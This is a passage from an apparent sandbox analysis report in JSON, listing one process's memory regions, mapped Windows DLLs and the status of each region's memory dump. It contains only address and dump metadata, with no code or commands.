"00:01:17.067", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1148", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:17.067", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001149-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_303", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1149", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:17.067", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1150", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:17.067", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001151-addr_0x00000000002b0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_304", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_1151", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:17.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1953464319, "entry_point": 1953431552, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1152", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:17.088", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1953497088, "type": "region", "version": 1 }, "end_va": 1953873919, "entry_point": 1953497088, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1153", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1953497088, "timestamp": "00:01:17.091", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1953890304, "type": "region", "version": 1 }, "end_va": 1954148351, "entry_point": 1953890304, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1154", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1953890304, "timestamp": "00:01:17.092", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001155-addr_0x0000000000550000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_305", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 6619135, "entry_point": 0, "filename": null, "id": "region_1155", "name": "private_0x0000000000550000", "norm_filename": null, "region_type": "private_memory", "start_va": 5570560, "timestamp": "00:01:17.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1965645823, "entry_point": 1965359104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1156", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:01:17.138", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973354496, "type": "region", "version": 1 }, "end_va": 1974468607, "entry_point": 1973354496, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1157", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973354496, "timestamp": "00:01:17.178", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001158-addr_0x0000000076e70000-size_0x00000000000fa000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_306", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 0, "filename": null, "id": "region_1158", "name": "private_0x0000000076e70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994850304, "timestamp": "00:01:17.342", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001159-addr_0x0000000076f70000-size_0x000000000011f000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_307", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 0, "filename": null, "id": "region_1159", "name": "private_0x0000000076f70000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995898880, "timestamp": "00:01:17.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1160", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:17.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 1703936, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1161", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:01:17.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1388544, "start_va": 1922301952, "type": "region", "version": 1 }, "end_va": 1923690495, "entry_point": 1922301952, "filename": "\\Windows\\SysWOW64\\msvbvm60.dll", "id": "region_1162", "name": "msvbvm60.dll", "norm_filename": "c:\\windows\\syswow64\\msvbvm60.dll", "region_type": "memory_mapped_file", "start_va": 1922301952, "timestamp": "00:01:17.382", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960624127, "entry_point": 1960574976, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1163", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:01:17.390", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1960640512, "type": "region", "version": 1 }, "end_va": 1961033727, "entry_point": 1960640512, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1164", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1960640512, "timestamp": "00:01:17.391", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1961426944, "type": "region", "version": 1 }, "end_va": 1961529343, "entry_point": 1961426944, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1165", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1961426944, "timestamp": "00:01:17.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1964179456, "type": "region", "version": 1 }, "end_va": 1964769279, "entry_point": 1964179456, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1166", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1964179456, "timestamp": "00:01:17.393", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1965686784, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1965686784, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1167", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1965686784, "timestamp": "00:01:17.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1967456256, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_1168", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:01:17.430", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1969541119, "entry_point": 1968898048, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1169", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:17.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1970143232, "type": "region", "version": 1 }, "end_va": 1970798591, "entry_point": 1970143232, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1170", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1970143232, "timestamp": "00:01:17.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970839551, "entry_point": 1970798592, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1171", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:01:17.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1971912703, "entry_point": 1970864128, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1172", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:01:17.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991639040, "type": "region", "version": 1 }, "end_va": 1992224767, "entry_point": 1991639040, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_1173", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991639040, "timestamp": "00:01:17.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1993867264, "type": "region", "version": 1 }, "end_va": 1994850303, "entry_point": 1993867264, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1174", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1993867264, "timestamp": "00:01:17.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1175", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:17.770", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1176", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:17.771", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001177-addr_0x0000000000270000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_308", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_1177", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:01:17.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6619136, "type": "region", "version": 1 }, "end_va": 8224767, "entry_point": 0, "filename": null, "id": "region_1178", "name": "pagefile_0x0000000000650000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6619136, "timestamp": "00:01:17.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961426943, "entry_point": 1961033728, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1179", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:01:17.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1974468608, "type": "region", "version": 1 }, "end_va": 1975304191, "entry_point": 1974468608, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1180", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1974468608, "timestamp": "00:01:17.800", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001181-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_309", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1181", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:17.809", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001182-addr_0x0000000000030000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_310", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_1182", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:17.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9834495, "entry_point": 0, "filename": null, "id": "region_1183", "name": "pagefile_0x00000000007e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8257536, "timestamp": "00:01:17.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9895936, "type": "region", "version": 1 }, "end_va": 30867455, "entry_point": 0, "filename": null, "id": "region_1184", "name": "pagefile_0x0000000000970000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9895936, "timestamp": "00:01:17.810", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001185-addr_0x0000000001d70000-size_0x0000000000140000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_311", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1310720, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_1185", "name": "private_0x0000000001d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 30867456, "timestamp": "00:01:17.811", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001186-addr_0x0000000001eb0000-size_0x0000000000400000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_312", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4194304, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 36372479, "entry_point": 0, "filename": null, "id": "region_1186", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:01:17.811", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36372480, "type": "region", "version": 1 }, "end_va": 39317503, "entry_point": 36372480, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1187", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36372480, "timestamp": "00:01:17.816", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001188-addr_0x0000000000330000-size_0x0000000000070000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_313", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_1188", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:01:17.818", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001189-addr_0x0000000000210000-size_0x0000000000060000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_314", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 393216, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1189", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:17.820", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1952841728, "type": "region", "version": 1 }, "end_va": 1953366015, "entry_point": 1952841728, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_1190", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1952841728, "timestamp": "00:01:17.825", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001191-addr_0x0000000002580000-size_0x0000000000180000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_315", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1572864, "start_va": 39321600, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_1191", "name": "private_0x0000000002580000", "norm_filename": null, "region_type": "private_memory", "start_va": 39321600, "timestamp": "00:01:17.976", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5369855, "entry_point": 0, "filename": null, "id": "region_1192", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:01:17.978", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001193-addr_0x0000000002700000-size_0x0000000000170000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_316", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1507328, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 42401791, "entry_point": 0, "filename": null, "id": "region_1193", "name": "private_0x0000000002700000", "norm_filename": null, "region_type": "private_memory", "start_va": 40894464, "timestamp": "00:01:17.981", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001194-addr_0x0000000000210000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_317", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2228223, "entry_point": 0, "filename": null, "id": "region_1194", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:17.982", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001195-addr_0x0000000000230000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_318", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1195", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:01:17.983", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1955856384, "type": "region", "version": 1 }, "end_va": 1956245503, "entry_point": 1955856384, "filename": "\\Windows\\SysWOW64\\sxs.dll", "id": "region_1196", "name": "sxs.dll", "norm_filename": "c:\\windows\\syswow64\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1955856384, "timestamp": "00:01:17.995", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1952710656, "type": "region", "version": 1 }, "end_va": 1952788479, "entry_point": 1952710656, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_1197", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1952710656, "timestamp": "00:01:18.161", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2256895, "entry_point": 0, "filename": null, "id": "region_1198", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:18.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2629631, "entry_point": 0, "filename": null, "id": "region_1199", "name": "pagefile_0x0000000000280000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2621440, "timestamp": "00:01:18.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 42401792, "type": "region", "version": 1 }, "end_va": 46542847, "entry_point": 0, "filename": null, "id": "region_1200", "name": "pagefile_0x0000000002870000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 42401792, "timestamp": "00:01:18.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 46596096, "type": "region", "version": 1 }, "end_va": 56229887, "entry_point": 46596096, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_1201", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 46596096, "timestamp": "00:01:18.221", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001202-addr_0x0000000001d70000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_319", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30867456, "type": "region", "version": 1 }, "end_va": 31391743, "entry_point": 0, "filename": null, "id": "region_1202", "name": "private_0x0000000001d70000", "norm_filename": null, "region_type": "private_memory", "start_va": 30867456, "timestamp": "00:01:18.233", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001203-addr_0x0000000001ea0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_320", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_1203", "name": "private_0x0000000001ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32112640, 